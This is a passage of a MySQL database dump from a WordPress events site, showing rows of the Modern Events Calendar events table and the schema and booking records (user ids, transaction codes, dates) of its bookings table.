,(439,268838,'2023-08-23','2023-08-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(440,268839,'2023-08-09','2023-08-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(441,268843,'2023-08-13','2023-08-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(442,268844,'2023-08-27','2023-08-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(443,268846,'2023-08-20','2023-08-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(444,268848,'2023-08-31','2023-08-31',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,72900),(463,268947,'2023-09-10','2023-09-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(446,268859,'2023-08-31','2023-08-31',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,72900),(447,268860,'2023-08-27','2023-08-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(449,268871,'2023-08-09','2023-08-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(450,268873,'2023-08-09','2023-08-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(451,268874,'2023-08-15','2023-08-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(452,268876,'2023-08-17','2023-08-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(471,269018,'2023-09-24','2023-09-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(454,268879,'2023-08-13','2023-08-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(455,268880,'2023-08-13','2023-08-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',50400,55800),(457,268914,'2023-09-17','2023-09-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(459,268934,'2023-09-06','2023-09-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(460,268935,'2023-09-10','2023-09-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(461,268940,'2023-09-03','2023-09-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(483,269143,'2023-10-08','2023-10-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(464,268950,'2023-09-24','2023-09-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(465,268953,'2023-09-21','2023-09-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(466,268958,'2023-10-21','2023-10-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(467,268962,'2023-08-31','2023-08-31',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(468,268963,'2023-09-13','2023-09-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(469,268965,'2023-10-01','2024-09-01',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(470,268972,'2023-09-13','2023-09-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(490,269259,'2023-11-05','2023-11-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(473,269107,'2023-10-01','2023-10-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(474,269108,'2023-10-01','2023-10-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(475,269109,'2023-10-08','2023-10-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(476,269110,'2023-10-08','2023-10-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(477,269111,'2023-10-04','2023-10-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(478,269118,'2023-10-28','2023-10-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',52200,56700),(486,269147,'2023-10-29','2023-10-29',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(487,269149,'2023-10-30','2023-10-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(488,269160,'2023-10-12','2023-10-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(489,269184,'2023-10-22','2023-10-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(491,269260,'2023-11-12','2023-11-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(492,269262,'2023-11-16','2023-11-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(493,269265,'2023-11-18','2023-11-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(494,269268,'2023-11-01','2023-11-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(495,269272,'2023-11-19','2023-11-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(496,269301,'2023-11-18','2023-11-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',48600,52200),(497,269302,'2023-11-18','2023-11-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',48600,52200),(499,269324,'2023-11-26','0000-00-00',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(500,269326,'2023-11-12','2023-11-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(501,269329,'2022-12-10','2022-12-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',39600,43200),(502,269330,'2023-11-19','2023-11-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(503,269340,'2023-11-15','2023-11-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(504,269341,'2023-11-15','2023-11-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(505,269387,'2023-11-16','2024-01-31',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(506,269392,'2023-12-06','2023-12-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(507,269412,'2023-12-10','2023-12-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(508,269415,'2023-12-10','2023-12-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(509,269416,'2023-12-03','2023-12-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400);
/*!40000 ALTER TABLE `wpcl_mec_events` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_mec_events` with 446 row(s)
--

--
-- Table structure for table `wpcl_mec_bookings`
--

DROP TABLE IF EXISTS `wpcl_mec_bookings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_mec_bookings` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `booking_id` int(10) unsigned NOT NULL,
  `user_id` int(10) unsigned DEFAULT NULL,
  `transaction_id` varchar(20) DEFAULT NULL,
  `event_id` int(10) unsigned NOT NULL,
  `ticket_ids` varchar(655) NOT NULL,
  `seats` int(10) unsigned NOT NULL DEFAULT 0,
  `status` varchar(20) NOT NULL DEFAULT 'pending',
  `confirmed` tinyint(4) NOT NULL DEFAULT 0,
  `verified` tinyint(4) NOT NULL DEFAULT 0,
  `all_occurrences` tinyint(4) NOT NULL DEFAULT 0,
  `date` datetime NOT NULL,
  `timestamp` int(10) unsigned NOT NULL,
  PRIMARY KEY (`id`),
  KEY `booking_id` (`booking_id`),
  KEY `timestamp` (`timestamp`),
  KEY `user_id` (`user_id`),
  KEY `user_id_2` (`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=415 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_mec_bookings`
--

LOCK TABLES `wpcl_mec_bookings` WRITE;
/*!40000 ALTER TABLE `wpcl_mec_bookings` DISABLE KEYS */;
INSERT INTO `wpcl_mec_bookings` VALUES (126,266607,1000000,'DGZ85409',266573,',1,',1,'publish',1,1,0,'2022-05-01 10:30:00',1651401000),(127,266608,1000001,'UXS95594',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(128,266610,1000002,'PSA29618',266573,',1,',1,'publish',1,1,0,'2022-05-01 10:30:00',1651401000),(137,266621,1000003,'BMU65375',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(138,266644,1000004,'XLS29928',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(139,266654,1000005,'JFL25285',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(140,266655,1000006,'NXZ69692',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(141,266660,1000007,'UGK94037',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(142,266661,1000008,'NZC30524',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(143,266662,1000009,'EWV99156',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(144,266663,1000010,'HFX86700',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(145,266664,1000003,'EWU87439',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(146,266665,1000011,'VFB37200',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(147,266666,1000011,'BDC98943',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(148,266667,1000012,'FBM20391',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(149,266669,1000013,'JHY63353',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(150,266670,1000014,'YWK45796',266568,',1,',1,'publish',1,1,0,'2022-05-08 10:30:00',1652005800),(151,266673,1000015,'GDA52192',266604,',1,',1,'publish',1,1,0,'2022-05-15 11:45:00',1652615100),(152,266674,1000015,'PNE35451',266611,',1,',1,'publish',1,1,0,'2022-05-17 19:00:00',1652814000),(153,266683,1000016,'JPU32767',266604,',1,',1,'publish',1,1,0,'2022-05-15 11:45:00',1652615100),(154,266686,1000015,'CER60581',266611,',1,',1,'publish',1,1,0,'2022-05-17 19:00:00',1652814000),(155,266691,1000017,'QLR29831',266604,',1,',1,'publish',1,1,0,'2022-06-19 11:45:00',1655639100),(156,266711,1000018,'PBG26291',266611,',1,',1,'publish',1,1,0,'2022-06-21 19:00:00',1655838000),(158,266740,1000019,'ZEO50148',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(159,266763,1000020,'JND22470',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(160,266768,1000009,'KBC10697',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(161,266770,1000021,'HRV31118',266540,',1,',1,'publish',1,1,0,'2027-05-09 10:30:00',1809858600),(162,266778,1000020,'QXR88867',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(163,266779,1000022,'GHO72540',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(164,266780,1000014,'MSZ77243',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(165,266781,1000023,'ZGJ87490',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(166,266782,1000016,'QNL40447',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(167,266783,1000010,'JLU20674',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(168,266784,1000024,'LXD72914',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(169,266785,1000014,'PHX31955',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(170,266786,1000025,'POU61640',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(171,266787,1000026,'AKM39050',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(172,266788,1000027,'SRW45694',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(173,266789,1000012,'LPQ47947',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(174,266790,1000028,'DAO21292',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(175,266791,1000023,'MWP96909',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(176,266792,1000023,'CVJ29975',266715,',1,',1,'publish',1,1,0,'2022-06-12 10:30:00',1655029800),(177,266794,1000029,'FYW24835',266604,',1,',1,'publish',1,1,0,'2022-06-19 11:45:00',1655639100),(178,266795,1000029,'JBU21686',266611,',1,',1,'publish',1,1,0,'2022-06-21 19:00:00',1655838000),(179,266796,1000029,'GFQ26947',266604,',1,',1,'publish',1,1,0,'2022-07-17 11:45:00',1658058300),(180,266799,1000030,'OKA60338',266604,',1,',1,'publish',1,1,0,'2022-06-19 11:45:00',1655639100),(181,266817,1000021,'NZS19398',266815,',1,',1,'publish',1,1,0,'2022-07-03 10:30:00',1656844200),(182,266822,1000021,'VZC41276',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(183,266824,1000031,'CFQ67977',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(184,266834,1000032,'GNP44203',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(185,266835,1000022,'MEX17710',266815,',1,',1,'publish',1,1,0,'2022-07-03 10:30:00',1656844200),(186,266836,1000022,'MWK57524',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(187,266846,1000024,'FGB37612',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(188,266847,1000015,'ETD58832',266611,',1,',1,'publish',1,1,0,'2022-07-19 19:00:00',1658257200),(189,266848,1000015,'HBU30082',266604,',1,',1,'publish',1,1,0,'2022-07-17 11:45:00',1658058300),(190,266851,1000023,'FGM19808',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(191,266852,1000033,'YVR35929',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(192,266853,1000033,'XDS71085',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(193,266854,1000006,'UWY19613',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(194,266855,1000006,'PKC99995',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(195,266856,1000022,'KLR12655',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(196,266857,1000014,'VQY60201',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(197,266858,1000021,'UGM28529',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(198,266859,1000006,'FNV15669',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(199,266860,1000012,'CZA82590',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(200,266861,1000034,'GOV55106',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(201,266863,1000035,'HDF28140',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(202,266864,1000036,'DGX64933',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(203,266865,1000037,'PTA53516',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(204,266866,1000038,'QHT74612',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(205,266867,1000001,'KND86843',266820,',1,',1,'publish',1,1,0,'2022-07-10 10:30:00',1657449000),(206,266885,1000036,'RPJ12773',266611,',1,',1,'publish',1,1,0,'2022-07-19 19:00:00',1658257200),(207,266886,1000036,'FGJ98579',266611,',1,',1,'publish',1,1,0,'2022-08-16 19:00:00',1660676400),(208,266887,1000036,'HNP42868',266604,',1,',1,'publish',1,1,0,'2022-08-21 11:45:00',1661082300),(209,266948,1000036,'NVE31441',266611,',1,',1,'publish',1,1,0,'2022-09-20 19:00:00',1663700400),(210,266986,1000015,'XRD92748',266611,',1,',1,'publish',1,1,0,'2022-08-16 19:00:00',1660676400),(211,266987,1000015,'NAV22465',266604,',1,',1,'publish',1,1,0,'2022-08-21 11:45:00',1661082300),(212,266992,1000036,'GUZ25189',266604,',1,',1,'publish',1,1,0,'2022-09-18 11:45:00',1663501500),(213,267025,1000039,'NPY55281',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(214,267026,1000023,'ENQ21914',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(215,267027,1000022,'GNP97349',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(216,267028,1000040,'NVD41326',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(217,267029,1000024,'KHZ16572',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(218,267030,1000041,'DKQ16933',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(219,267031,1000042,'FRH10759',266996,',1,',1,'publish',1,1,0,'2022-08-14 10:30:00',1660473000),(220,267047,1000043,'UPC13837',266604,',1,',1,'publish',1,1,0,'2022-08-21 11:45:00',1661082300),(221,267048,1000044,'HKR22239',266604,',1,',1,'publish',1,1,0,'2022-08-21 11:45:00',1661082300),(222,267087,1000036,'BGC17641',267041,',1,',1,'publish',1,1,0,'2022-09-04 10:30:00',1662287400),(223,267131,1000043,'DCT33560',267041,',1,',1,'publish',1,1,0,'2022-09-04 10:30:00',1662287400),(224,267132,1000045,'TUN63374',267041,',1,',1,'publish',1,1,0,'2022-09-04 10:30:00',1662287400),(225,267133,1000015,'YHT98148',266611,',1,',1,'publish',1,1,0,'2022-09-20 19:00:00',1663700400),(226,267189,1000026,'PAV22929',267044,',1,',1,'publish',1,1,0,'2022-09-11 10:30:00',1662892200),(227,267191,1000023,'GWX12508',267044,',1,',1,'publish',1,1,0,'2022-09-11 10:30:00',1662892200),(228,267192,1000026,'JUN71113',267044,',1,',1,'publish',1,1,0,'2022-09-11 10:30:00',1662892200),(229,267193,1000022,'TRL39941',267044,',1,',1,'publish',1,1,0,'2022-09-11 10:30:00',1662892200),(230,267194,1000046,'KLB99384',267044,',1,',1,'publish',1,1,0,'2022-09-11 10:30:00',1662892200),(231,267195,1000047,'SXK40420',267044,',1,',1,'publish',1,1,0,'2022-09-11 10:30:00',1662892200),(232,267226,1000015,'CNR30256',266604,',1,',1,'publish',1,1,0,'2022-09-18 11:45:00',1663501500),(233,267227,1000044,'AYU51854',266604,',1,',1,'publish',1,1,0,'2022-09-18 11:45:00',1663501500),(234,267228,1000014,'EOH55126',266604,',1,',1,'publish',1,1,0,'2022-09-18 11:45:00',1663501500),(235,267243,1000015,'HPM19481',266611,',1,',1,'publish',1,1,0,'2022-09-20 19:00:00',1663700400),(236,267260,1000015,'MOF87584',266604,',1,',1,'publish',1,1,0,'2022-10-16 11:45:00',1665920700),(237,267300,1000048,'MUA58591',267237,',1,',1,'publish',1,1,0,'2022-10-09 10:30:00',1665311400),(238,267301,1000049,'NYM84882',267237,',1,',1,'publish',1,1,0,'2022-10-09 10:30:00',1665311400),(239,267302,1000023,'TXR11723',267237,',1,',1,'publish',1,1,0,'2022-10-09 10:30:00',1665311400),(240,267303,1000047,'BGC33180',267237,',1,',1,'publish',1,1,0,'2022-10-09 10:30:00',1665311400),(241,267320,1000044,'RCO64499',266604,',1,',1,'publish',1,1,0,'2022-10-16 11:45:00',1665920700),(242,267321,1000044,'CBT92815',266604,',1,',1,'publish',1,1,0,'2022-10-16 11:45:00',1665920700),(243,267329,1000050,'GZD40069',266604,',1,',1,'publish',1,1,0,'2022-10-16 11:45:00',1665920700),(244,267330,1000014,'ENJ93195',266604,',1,',1,'publish',1,1,0,'2022-10-16 11:45:00',1665920700),(245,267331,1000014,'TOD81749',266604,',1,',1,'publish',1,1,0,'2022-10-16 11:45:00',1665920700),(246,267395,1000050,'KLW43515',267334,',1,',1,'publish',1,1,0,'2022-11-06 10:30:00',1667730600),(247,267406,1000051,'QTD92990',267334,',1,',1,'publish',1,1,0,'2022-11-06 10:30:00',1667730600),(248,267415,1000043,'BRH36761',267334,',1,',1,'publish',1,1,0,'2022-11-06 10:30:00',1667730600),(249,267417,1000052,'BJA68504',267334,',1,',1,'publish',1,1,0,'2022-11-06 10:30:00',1667730600),(250,267419,1000050,'XVA53791',267408,',1,',1,'publish',1,1,0,'2022-11-13 10:30:00',1668335400),(251,267440,1000053,'YVC14670',267408,',1,',1,'publish',1,1,0,'2022-11-13 10:30:00',1668335400),(252,267451,1000054,'FDN78743',267408,',1,',1,'publish',1,1,0,'2022-11-13 10:30:00',1668335400),(253,267516,1000050,'TJO25322',267433,',1,',1,'publish',1,1,0,'2022-11-20 12:45:00',1668948300),(254,267517,1000050,'EFA15402',267433,',1,',1,'publish',1,1,0,'2022-11-20 12:45:00',1668948300),(255,267518,1000015,'SMY83311',267433,',1,',1,'publish',1,1,0,'2022-11-20 12:45:00',1668948300),(256,267550,1000055,'SCQ96323',266604,',1,',1,'publish',1,1,0,'2022-12-18 11:45:00',1671363900),(257,267560,1000023,'CAP72345',267554,',1,',1,'publish',1,1,0,'2022-12-11 10:30:00',1670754600),(258,267561,1000056,'TMC76720',267554,',1,',1,'publish',1,1,0,'2022-12-11 10:30:00',1670754600),(259,267562,1000022,'LOW74542',267554,',1,',1,'publish',1,1,0,'2022-12-11 10:30:00',1670754600),(260,267563,1000022,'DZP26574',267554,',1,',1,'publish',1,1,0,'2022-12-11 10:30:00',1670754600),(261,267564,1000050,'KWF87636',267539,',1,',1,'publish',1,1,0,'2022-12-18 10:30:00',1671359400),(262,267582,1000057,'WZX17855',267539,',1,',1,'publish',1,1,0,'2022-12-18 10:30:00',1671359400),(263,267583,1000058,'JSG10325',266604,',1,',1,'publish',1,1,0,'2022-12-18 11:45:00',1671363900),(264,267584,1000059,'KNF20107',267577,',1,',1,'publish',1,1,0,'2023-01-08 10:30:00',1673173800),(265,267585,1000060,'EFN27658',267577,',1,',1,'publish',1,1,0,'2023-01-08 10:30:00',1673173800),(266,267587,1000015,'PWO99875',266604,',1,',1,'publish',1,1,0,'2022-12-18 11:45:00',1671363900),(267,267588,1000014,'JSW98977',266604,',1,',1,'publish',1,1,0,'2022-12-18 11:45:00',1671363900),(268,267589,1000061,'HPY63199',266604,',1,',1,'publish',1,1,0,'2022-12-18 11:45:00',1671363900),(269,267601,1000062,'NWT38307',267579,',1,',1,'publish',1,1,0,'2023-01-01 10:30:00',1672569000),(270,267611,1000039,'GPE25821',267577,',1,',1,'publish',1,1,0,'2023-01-08 10:30:00',1673173800),(271,267614,1000022,'DMP71445',267577,',1,',1,'publish',1,1,0,'2023-01-08 10:30:00',1673173800),(272,267616,1000063,'HUW88257',267577,',1,',1,'publish',1,1,0,'2023-01-08 10:30:00',1673173800),(273,267702,1000064,'BND81763',267433,',1,',1,'publish',1,1,0,'2023-01-22 11:45:00',1674387900),(274,267703,1000064,'EPV44453',267570,',1,',1,'publish',1,1,0,'2023-01-22 10:30:00',1674383400),(275,267739,1000015,'JET55973',267433,',1,',1,'publish',1,1,0,'2023-01-22 11:45:00',1674387900),(276,267741,1000057,'ZAJ99074',267570,',1,',1,'publish',1,1,0,'2023-01-22 10:30:00',1674383400),(277,267742,1000065,'ENK36819',267570,',1,',1,'publish',1,1,0,'2023-01-22 10:30:00',1674383400),(278,267743,1000066,'OUJ15457',267570,',1,',1,'publish',1,1,0,'2023-01-22 10:30:00',1674383400),(279,267745,1000062,'RCZ50342',267570,',1,',1,'publish',1,1,0,'2023-01-22 10:30:00',1674383400),(297,268113,1000069,'VRP48575',268025,',1,',1,'publish',1,1,0,'2023-03-05 10:30:00',1678012200),(298,268160,1000022,'PKA72335',268025,',1,',1,'publish',1,1,0,'2023-03-05 10:30:00',1678012200),(299,268163,1000061,'CKL91840',268025,',1,',1,'publish',1,1,0,'2023-03-05 10:30:00',1678012200),(300,268164,1000070,'THO64273',268025,',1,',1,'publish',1,1,0,'2023-03-05 10:30:00',1678012200),(301,268165,1000071,'XWY27893',268025,',1,',1,'publish',1,1,0,'2023-03-05 10:30:00',1678012200),(302,268170,1000072,'ADP84617',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(292,267942,1000012,'HPX73073',267730,',1,',1,'publish',1,1,0,'2023-02-12 10:30:00',1676197800),(293,267953,1000068,'TBK90038',267730,',1,',1,'publish',1,1,0,'2023-02-12 10:30:00',1676197800),(294,267954,1000030,'UFZ39610',267730,',1,',1,'publish',1,1,0,'2023-02-12 10:30:00',1676197800),(295,267955,1000047,'DFL79438',267730,',1,',1,'publish',1,1,0,'2023-02-12 10:30:00',1676197800),(296,267956,1000007,'RMB80706',267730,',1,',1,'publish',1,1,0,'2023-02-12 10:30:00',1676197800),(303,268182,1000073,'WNA72525',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(304,268183,1000012,'SUN77604',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(305,268184,1000020,'SQN40282',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(306,268185,1000044,'OXD16051',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(307,268186,1000048,'TOH14609',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(308,268187,1000061,'AZK42289',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(309,268188,1000074,'GHT23161',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(310,268189,1000075,'JMG89836',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(311,268190,1000076,'SLK33746',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(312,268191,1000071,'PNU33974',268027,',1,',1,'publish',1,1,0,'2023-03-12 10:30:00',1678617000),(313,268261,1000014,'YEL51667',267433,',1,',1,'publish',1,1,0,'2023-03-26 11:45:00',1679831100),(314,268285,1000077,'ZQS12163',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(315,268375,1000020,'SMD96569',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(316,268378,1000078,'ZGQ88479',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(317,268382,1000079,'AOX10183',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(318,268383,1000023,'HVO20373',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(319,268384,1000080,'FEZ57564',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(320,268385,1000047,'FZE83069',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(321,268386,1000081,'NXB88494',268197,',1,',1,'publish',1,1,0,'2023-04-09 10:30:00',1681036200),(322,268431,1000082,'SNV66954',268430,',1,',1,'publish',1,1,0,'2023-05-07 10:30:00',1683455400),(323,268459,1000078,'SJA73724',268430,',1,',1,'publish',1,1,0,'2023-05-07 10:30:00',1683455400),(324,268463,1000081,'OTP13966',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(325,268465,1000081,'AUX15539',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(326,268467,1000023,'DKV30060',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(327,268468,1000081,'PYX90518',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(328,268469,1000081,'UFH29900',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(329,268470,1000014,'GPM41789',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(330,268471,1000047,'EPX33602',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(331,268472,1000023,'JXG14538',268417,',1,',1,'publish',1,1,0,'2023-05-14 10:30:00',1684060200),(332,268532,1000081,'MLC23904',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(333,268572,1000083,'YON92518',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(334,268601,1000077,'SUT85426',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(335,268602,1000024,'JUR56597',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(336,268605,1000084,'OUW18714',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(337,268614,1000023,'AYS54080',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(338,268615,1000085,'ZMK94087',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(339,268616,1000022,'DOZ50327',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(340,268617,1000086,'VTM37468',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(341,268618,1000087,'FDM78046',268482,',1,',1,'publish',1,1,0,'2023-06-11 